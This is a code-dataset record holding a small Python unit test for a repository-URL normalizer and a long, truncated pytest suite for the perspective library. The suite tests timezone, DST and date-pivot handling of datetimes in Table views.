16e884a88674f69f53168af91d40d8bbaf1ef361
| 157
|
py
|
Python
|
tests/test_rehome.py
|
hiqdev/rehome
|
f14ff75c352a9d4d35a4f6e26a6ad66ad9677099
|
[
"BSD-3-Clause"
] | 5
|
2016-09-23T09:48:45.000Z
|
2018-10-29T13:37:50.000Z
|
tests/test_rehome.py
|
hiqdev/rehome
|
f14ff75c352a9d4d35a4f6e26a6ad66ad9677099
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_rehome.py
|
hiqdev/rehome
|
f14ff75c352a9d4d35a4f6e26a6ad66ad9677099
|
[
"BSD-3-Clause"
] | null | null | null |
import Rehome
def test_normalize_repo():
    """normalize_repo keeps '.' untouched and expands owner/name shorthands."""
    assert Rehome.normalize_repo('.') == '.'
    assert Rehome.normalize_repo('a/b') == 'https://github.com/a/b'
| 19.625
| 67
| 0.66242
| 21
| 157
| 4.761905
| 0.571429
| 0.39
| 0.38
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146497
| 157
| 7
| 68
| 22.428571
| 0.746269
| 0
| 0
| 0
| 0
| 0
| 0.174194
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc5eb207fe304a37cc6208deadedbb743424f931
| 56,727
|
py
|
Python
|
python/perspective/perspective/tests/table/test_table_datetime.py
|
mehtabhavin10/perspective
|
faa9f721d0518a620508a78298a96cb005c07275
|
[
"Apache-2.0"
] | 1
|
2020-05-13T06:30:55.000Z
|
2020-05-13T06:30:55.000Z
|
python/perspective/perspective/tests/table/test_table_datetime.py
|
mehtabhavin10/perspective
|
faa9f721d0518a620508a78298a96cb005c07275
|
[
"Apache-2.0"
] | null | null | null |
python/perspective/perspective/tests/table/test_table_datetime.py
|
mehtabhavin10/perspective
|
faa9f721d0518a620508a78298a96cb005c07275
|
[
"Apache-2.0"
] | null | null | null |
# *****************************************************************************
#
# Copyright (c) 2019, the Perspective Authors.
#
# This file is part of the Perspective library, distributed under the terms of
# the Apache License 2.0. The full license can be found in the LICENSE file.
#
import os
import time
import pytz
import numpy as np
import pandas as pd
from datetime import date, datetime
from dateutil import tz
from perspective.table import Table
# Naive local datetimes used throughout the suite.
LOCAL_DATETIMES = [
    datetime(2019, 1, 11, 0, 10, 20),
    datetime(2019, 1, 11, 11, 10, 20),
    datetime(2019, 1, 11, 19, 10, 20),
]

# Dates straddling the US DST transitions (March spring-forward, November fall-back).
LOCAL_DATETIMES_DST = [
    datetime(2019, 3, 9, 12, 10, 20),
    datetime(2019, 3, 19, 12, 10, 20),
    datetime(2019, 11, 2, 12, 10, 20),
    datetime(2019, 11, 3, 12, 10, 20),
]

# pandas.Timestamp mirrors of the datetime fixtures above.
LOCAL_TIMESTAMPS = [pd.Timestamp(d) for d in LOCAL_DATETIMES]
LOCAL_TIMESTAMPS_DST = [pd.Timestamp(d) for d in LOCAL_DATETIMES_DST]

# UTC-localized variants.
UTC = pytz.UTC
UTC_DATETIMES = [UTC.localize(d) for d in LOCAL_DATETIMES]
UTC_TIMESTAMPS = [UTC.localize(d) for d in LOCAL_TIMESTAMPS]
UTC_DATETIMES_DST = [UTC.localize(d, is_dst=True) for d in LOCAL_DATETIMES_DST]
UTC_TIMESTAMPS_DST = [UTC.localize(d, is_dst=True) for d in LOCAL_TIMESTAMPS_DST]

# A spread of timezones east and west of UTC.
PST = pytz.timezone("US/Pacific")
CST = pytz.timezone("US/Central")
EST = pytz.timezone("US/Eastern")
GMT = pytz.timezone("GMT")
HKT = pytz.timezone("Asia/Hong_Kong")
JPT = pytz.timezone("Asia/Tokyo")
ACT = pytz.timezone("Australia/ACT")
TIMEZONES = [PST, CST, EST, GMT, HKT, JPT, ACT]

# Per-zone lookup tables keyed by tz name.
TZ_DATETIMES = {}
TZ_TIMESTAMPS = {}
TZ_DATETIMES_DST = {}
TZ_TIMESTAMPS_DST = {}
for TZ in TIMEZONES:
    TZ_DATETIMES[TZ.zone] = [TZ.localize(d) for d in LOCAL_DATETIMES]
    TZ_TIMESTAMPS[TZ.zone] = [d.tz_localize(TZ) for d in LOCAL_TIMESTAMPS]
    TZ_DATETIMES_DST[TZ.zone] = [d.astimezone(TZ) for d in UTC_DATETIMES_DST]
    TZ_TIMESTAMPS_DST[TZ.zone] = [d.tz_convert(TZ) for d in UTC_TIMESTAMPS_DST]
if os.name != 'nt':
    # time.tzset() does not exist on Windows, so run these on linux/mac only.
    class TestTableLocalDateTime(object):
        """Test datetimes across configurations such as local time,
        timezone-aware, timezone-naive, and UTC implementations.
        """

        def setup_method(self):
            # Pin local time to EST so naive-datetime expectations are stable.
            os.environ["TZ"] = "US/Eastern"
            time.tzset()

        def teardown_method(self):
            # Restore UTC after each test for consistency.
            os.environ["TZ"] = "UTC"
            time.tzset()

        def test_table_should_assume_local_time(self):
            """A datetime without `tzinfo` is treated as local and not converted."""
            table = Table({"a": LOCAL_DATETIMES})
            assert table.view().to_dict()["a"] == LOCAL_DATETIMES

        def test_table_should_assume_local_time_numpy_datetime64(self):
            table = Table({"a": [np.datetime64(d) for d in LOCAL_DATETIMES]})
            assert table.view().to_dict()["a"] == LOCAL_DATETIMES

        def test_table_should_assume_local_time_pandas_timestamp(self):
            # Timestamps are assumed UTC by pandas but read back in local time.
            table = Table({"a": LOCAL_TIMESTAMPS})
            assert table.view().to_dict()["a"] == LOCAL_DATETIMES

        def test_table_should_assume_local_time_pandas_timestamp_df(self):
            # From a DataFrame, UTC timestamps come back shifted to EST.
            table = Table(pd.DataFrame({"a": LOCAL_TIMESTAMPS}))
            assert table.view().to_dict()["a"] == [
                datetime(2019, 1, 10, 19, 10, 20),
                datetime(2019, 1, 11, 6, 10, 20),
                datetime(2019, 1, 11, 14, 10, 20),
            ]

        def test_table_should_assume_local_time_dst(self):
            """Naive datetimes around DST boundaries pass through unchanged."""
            table = Table({"a": LOCAL_DATETIMES_DST})
            assert table.view().to_dict()["a"] == LOCAL_DATETIMES_DST

        def test_table_should_assume_local_time_numpy_datetime64_dst(self):
            table = Table({"a": [np.datetime64(d) for d in LOCAL_DATETIMES_DST]})
            assert table.view().to_dict()["a"] == LOCAL_DATETIMES_DST

        def test_table_should_assume_local_time_pandas_timestamp_dst(self):
            table = Table({"a": LOCAL_TIMESTAMPS_DST})
            assert table.view().to_dict()["a"] == LOCAL_DATETIMES_DST

        def test_table_should_assume_local_time_pandas_timestamp_dst_df(self):
            table = Table(pd.DataFrame({"a": LOCAL_TIMESTAMPS_DST}))
            assert table.view().to_dict()["a"] == [
                datetime(2019, 3, 9, 7, 10, 20),
                datetime(2019, 3, 19, 8, 10, 20),
                datetime(2019, 11, 2, 8, 10, 20),
                datetime(2019, 11, 3, 7, 10, 20),
            ]

        def test_table_datetime_min(self):
            table = Table({"a": [datetime.min]})
            assert table.view().to_dict()["a"] == [
                datetime(1969, 12, 31, 19, 0)
            ]

        def test_table_datetime_min_df(self):
            table = Table(pd.DataFrame({"a": [datetime.min]}))
            assert table.view().to_dict()["a"] == [
                datetime(1969, 12, 31, 19, 0)
            ]

        def test_table_datetime_1900(self):
            table = Table({"a": [datetime(1900, 1, 1)]})
            assert table.view().to_dict()["a"] == [
                datetime(1900, 1, 1)
            ]

        def test_table_datetime_1900_df(self):
            table = Table(pd.DataFrame({"a": [datetime(1900, 1, 1)]}))
            assert table.view().to_dict()["a"] == [
                datetime(1899, 12, 31, 19)
            ]

        def test_table_datetime_1899(self):
            table = Table({"a": [datetime(1899, 1, 1)]})
            assert table.view().to_dict()["a"] == [
                datetime(1898, 12, 31, 19)
            ]

        def test_table_datetime_1899_df(self):
            table = Table(pd.DataFrame({"a": [datetime(1899, 1, 1)]}))
            assert table.view().to_dict()["a"] == [
                datetime(1898, 12, 31, 19)
            ]

        def test_table_datetime_min_epoch(self):
            # Epoch 0 fed through an explicit datetime schema.
            table = Table({"a": datetime})
            table.update({"a": [0]})
            assert table.view().to_dict()["a"] == [
                datetime(1969, 12, 31, 19, 0)
            ]

        def test_table_datetime_min_epoch_df(self):
            table = Table({"a": datetime})
            table.update(pd.DataFrame({"a": [0]}))
            assert table.view().to_dict()["a"] == [
                datetime(1969, 12, 31, 19, 0)
            ]
class TestTableDateTimeUTCToLocal(object):
def teardown_method(self):
# Set timezone to UTC, always
os.environ["TZ"] = "UTC"
time.tzset()
def test_table_should_convert_UTC_to_local_time_pytz_pacific(self):
"""If the datetime has `tzinfo` set, use it to convert the datetime to
UTC. Make sure this works with both `pytz` and `dateutil` for
`datetime` and `pandas.Timestamp`.
"""
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "US/Pacific"
time.tzset()
# Should be in PST now
assert table.view().to_dict() == {
"a": [d.astimezone(PST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_pytz_central(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "US/Central"
time.tzset()
# Should be in CST now
assert table.view().to_dict() == {
"a": [d.astimezone(CST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_pytz_eastern(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict() == {
"a": [d.astimezone(EST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_pytz_GMT(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "GMT"
time.tzset()
# Should be in GMT now
assert table.view().to_dict() == {
"a": [d.astimezone(GMT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_pytz_HKT(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "Asia/Hong_Kong"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(HKT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_pytz_JPT(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "Asia/Tokyo"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(JPT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_pytz_ACT(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "Australia/Sydney"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(ACT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_pacific(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "US/Pacific"
time.tzset()
# Should be in PST now
assert table.view().to_dict() == {
"a": [d.astimezone(PST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_central(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "US/Central"
time.tzset()
# Should be in CST now
assert table.view().to_dict() == {
"a": [d.astimezone(CST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_eastern(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict() == {
"a": [d.astimezone(EST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_GMT(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "GMT"
time.tzset()
# Should be in GMT now
assert table.view().to_dict() == {
"a": [d.astimezone(GMT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_pacific_DST(self):
data = {
"a": UTC_DATETIMES_DST
}
table = Table(data)
os.environ["TZ"] = "US/Pacific"
time.tzset()
# Should be in PST now
assert table.view().to_dict() == {
"a": [d.replace(tzinfo=None) for d in TZ_DATETIMES_DST["US/Pacific"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_central_DST(self):
data = {
"a": UTC_DATETIMES_DST
}
table = Table(data)
os.environ["TZ"] = "US/Central"
time.tzset()
# Should be in CST now
assert table.view().to_dict() == {
"a": [d.replace(tzinfo=None) for d in TZ_DATETIMES_DST["US/Central"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_eastern_DST(self):
data = {
"a": UTC_DATETIMES_DST
}
table = Table(data)
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict() == {
"a": [d.replace(tzinfo=None) for d in TZ_DATETIMES_DST["US/Eastern"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_GMT_DST(self):
data = {
"a": UTC_DATETIMES_DST
}
table = Table(data)
os.environ["TZ"] = "GMT"
time.tzset()
# Should be in GMT now
assert table.view().to_dict() == {
"a": [d.replace(tzinfo=None) for d in TZ_DATETIMES_DST["GMT"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_pacific_DST_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS_DST
})
table = Table(data)
os.environ["TZ"] = "US/Pacific"
time.tzset()
# Should be in PST now
assert table.view().to_dict()["a"] == [d.replace(tzinfo=None) for d in TZ_DATETIMES_DST["US/Pacific"]]
def test_table_should_convert_UTC_to_local_time_dateutil_central_DST_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS_DST
})
table = Table(data)
os.environ["TZ"] = "US/Central"
time.tzset()
# Should be in CST now
assert table.view().to_dict()["a"] == [d.replace(tzinfo=None) for d in TZ_DATETIMES_DST["US/Central"]]
def test_table_should_convert_UTC_to_local_time_dateutil_eastern_DST_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS_DST
})
table = Table(data)
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict()["a"] == [d.replace(tzinfo=None) for d in TZ_DATETIMES_DST["US/Eastern"]]
def test_table_should_convert_UTC_to_local_time_dateutil_GMT_DST_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS_DST
})
table = Table(data)
os.environ["TZ"] = "GMT"
time.tzset()
# Should be in GMT now
assert table.view().to_dict()["a"] == [d.replace(tzinfo=None) for d in TZ_DATETIMES_DST["GMT"]]
def test_table_should_convert_UTC_to_local_time_dateutil_HKT(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "Asia/Hong_Kong"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(HKT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_JPT(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "Asia/Tokyo"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(JPT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_ACT(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "Australia/Sydney"
time.tzset()
ACT = tz.gettz("Australia/Sydney")
assert table.view().to_dict() == {
"a": [d.astimezone(ACT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_pytz_pacific_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "US/Pacific"
time.tzset()
# Should be in PST now
assert table.view().to_dict()["a"] == [d.astimezone(PST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_pytz_central_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "US/Central"
time.tzset()
# Should be in CST now
assert table.view().to_dict()["a"] == [d.astimezone(CST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_pytz_eastern_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict()["a"] == [d.astimezone(EST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_pytz_GMT_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "GMT"
time.tzset()
# Should be in GMT now
assert table.view().to_dict()["a"] == [d.astimezone(GMT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_pytz_HKT_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "Asia/Hong_Kong"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(HKT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_pytz_JPT_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "Asia/Tokyo"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(JPT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_pytz_ACT_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "Australia/Sydney"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(ACT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_dateutil_pacific_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "US/Pacific"
time.tzset()
# Should be in PST now
assert table.view().to_dict()["a"] == [d.astimezone(PST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_dateutil_central_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "US/Central"
time.tzset()
CST = tz.gettz("US/Central")
# Should be in CST now
assert table.view().to_dict()["a"] == [d.astimezone(CST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_dateutil_eastern_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict()["a"] == [d.astimezone(EST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_dateutil_GMT_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "GMT"
time.tzset()
GMT = tz.gettz("GMT")
# Should be in GMT now
assert table.view().to_dict()["a"] == [d.astimezone(GMT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_dateutil_HKT_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "Asia/Hong_Kong"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(HKT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_dateutil_JPT_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "Asia/Tokyo"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(JPT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_UTC_to_local_time_dateutil_ACT_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS
})
table = Table(data)
os.environ["TZ"] = "Australia/Sydney"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(ACT).replace(tzinfo=None) for d in data["a"]]
class TestTableDateTimeArbitaryToLocal(object):
def teardown_method(self):
# Set timezone to UTC, always
os.environ["TZ"] = "UTC"
time.tzset()
def test_table_should_convert_PST_to_local_time_pytz_central(self):
data = {
"a": TZ_DATETIMES["US/Pacific"]
}
table = Table(data)
os.environ["TZ"] = "US/Central"
time.tzset()
# Should be in CST now
assert table.view().to_dict() == {
"a": [d.astimezone(CST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_CST_to_local_time_pytz_eastern(self):
data = {
"a": TZ_DATETIMES["US/Central"]
}
table = Table(data)
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict() == {
"a": [d.astimezone(EST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_EST_to_local_time_pytz_GMT(self):
data = {
"a": TZ_DATETIMES["US/Eastern"]
}
table = Table(data)
os.environ["TZ"] = "GMT"
time.tzset()
# Should be in GMT now
assert table.view().to_dict() == {
"a": [d.astimezone(GMT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_GMT_to_local_time_pytz_HKT(self):
data = {
"a": TZ_DATETIMES["GMT"]
}
table = Table(data)
os.environ["TZ"] = "Asia/Hong_Kong"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(HKT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_HKT_to_local_time_pytz_JPT(self):
data = {
"a": TZ_DATETIMES["Asia/Hong_Kong"]
}
table = Table(data)
os.environ["TZ"] = "Asia/Tokyo"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(JPT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_JPT_to_local_time_pytz_ACT(self):
data = {
"a": TZ_DATETIMES["Asia/Tokyo"]
}
table = Table(data)
os.environ["TZ"] = "Australia/Sydney"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(ACT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_PST_to_local_time_dateutil_central(self):
data = {
"a": TZ_DATETIMES["US/Pacific"]
}
table = Table(data)
os.environ["TZ"] = "US/Central"
time.tzset()
# Should be in CST now
assert table.view().to_dict() == {
"a": [d.astimezone(CST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_CST_to_local_time_dateutil_eastern(self):
data = {
"a": TZ_DATETIMES["US/Central"]
}
table = Table(data)
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict() == {
"a": [d.astimezone(EST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_EST_to_local_time_dateutil_GMT(self):
data = {
"a": TZ_DATETIMES["US/Eastern"]
}
table = Table(data)
os.environ["TZ"] = "GMT"
time.tzset()
# Should be in GMT now
assert table.view().to_dict() == {
"a": [d.astimezone(GMT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_GMT_to_local_time_dateutil_HKT(self):
data = {
"a": TZ_DATETIMES["GMT"]
}
table = Table(data)
os.environ["TZ"] = "Asia/Hong_Kong"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(HKT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_HKT_to_local_time_dateutil_JPT(self):
data = {
"a": TZ_DATETIMES["Asia/Hong_Kong"]
}
table = Table(data)
os.environ["TZ"] = "Asia/Tokyo"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(JPT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_JPT_to_local_time_dateutil_ACT(self):
data = {
"a": TZ_DATETIMES["Asia/Tokyo"]
}
table = Table(data)
os.environ["TZ"] = "Australia/Sydney"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(ACT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_PST_to_local_time_pytz_central_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["US/Pacific"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "US/Central"
time.tzset()
# Should be in CST now
assert table.view().to_dict()["a"] == [d.astimezone(CST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_CST_to_local_time_pytz_eastern_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["US/Central"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict()["a"] == [d.astimezone(EST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_EST_to_local_time_pytz_GMT_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["US/Eastern"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "GMT"
time.tzset()
# Should be in GMT now
assert table.view().to_dict()["a"] == [d.astimezone(GMT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_GMT_to_local_time_pytz_HKT_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["GMT"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "Asia/Hong_Kong"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(HKT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_HKT_to_local_time_pytz_JPT_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["Asia/Hong_Kong"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "Asia/Tokyo"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(JPT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_JPT_to_local_time_pytz_ACT_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["Asia/Tokyo"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "Australia/Sydney"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(ACT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_PST_to_local_time_dateutil_central_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["US/Pacific"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "US/Central"
time.tzset()
# Should be in CST now
assert table.view().to_dict()["a"] == [d.astimezone(CST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_CST_to_local_time_dateutil_eastern_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["US/Central"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict()["a"] == [d.astimezone(EST).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_EST_to_local_time_dateutil_GMT_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["US/Eastern"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "GMT"
time.tzset()
# Should be in GMT now
assert table.view().to_dict()["a"] == [d.astimezone(GMT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_GMT_to_local_time_dateutil_HKT_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["GMT"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "Asia/Hong_Kong"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(HKT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_HKT_to_local_time_dateutil_JPT_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["Asia/Hong_Kong"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "Asia/Tokyo"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(JPT).replace(tzinfo=None) for d in data["a"]]
def test_table_should_convert_JPT_to_local_time_dateutil_ACT_timestamp(self):
data = {
"a": TZ_TIMESTAMPS["Asia/Tokyo"]
}
table = Table(pd.DataFrame(data))
os.environ["TZ"] = "Australia/Sydney"
time.tzset()
assert table.view().to_dict()["a"] == [d.astimezone(ACT).replace(tzinfo=None) for d in data["a"]]
class TestTableDateTimePivots(object):
def test_table_row_pivot_date_correct(self):
data = {
"a": [date(2020, i, 15) for i in range(1, 13)],
"b": [i for i in range(1, 13)]
}
table = Table(data)
view = table.view(row_pivots=["a"])
assert view.to_columns() == {
"__ROW_PATH__": [
[],
['2020-01-15'],
['2020-02-15'],
['2020-03-15'],
['2020-04-15'],
['2020-05-15'],
['2020-06-15'],
['2020-07-15'],
['2020-08-15'],
['2020-09-15'],
['2020-10-15'],
['2020-11-15'],
['2020-12-15']
],
"a": [12, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
"b": [78, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
}
def test_table_row_pivot_pandas_date_correct(self):
data = {
"a": [date(2020, i, 15) for i in range(1, 13)],
"b": [i for i in range(1, 13)]
}
table = Table(pd.DataFrame(data))
view = table.view(row_pivots=["a"])
assert view.to_columns() == {
"__ROW_PATH__": [
[],
['2020-01-15'],
['2020-02-15'],
['2020-03-15'],
['2020-04-15'],
['2020-05-15'],
['2020-06-15'],
['2020-07-15'],
['2020-08-15'],
['2020-09-15'],
['2020-10-15'],
['2020-11-15'],
['2020-12-15']
],
"index": [66, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11],
"a": [12, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
"b": [78, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
}
def test_table_column_pivot_date_correct(self):
data = {
"a": [date(2020, i, 15) for i in range(1, 13)],
"b": [i for i in range(1, 13)]
}
table = Table(data)
view = table.view(column_pivots=["a"])
assert view.to_columns() == {
'2020-01-15|a': [datetime(2020, 1, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-01-15|b': [1,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-02-15|a': [None,
datetime(2020, 2, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-02-15|b': [None,
2,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None],
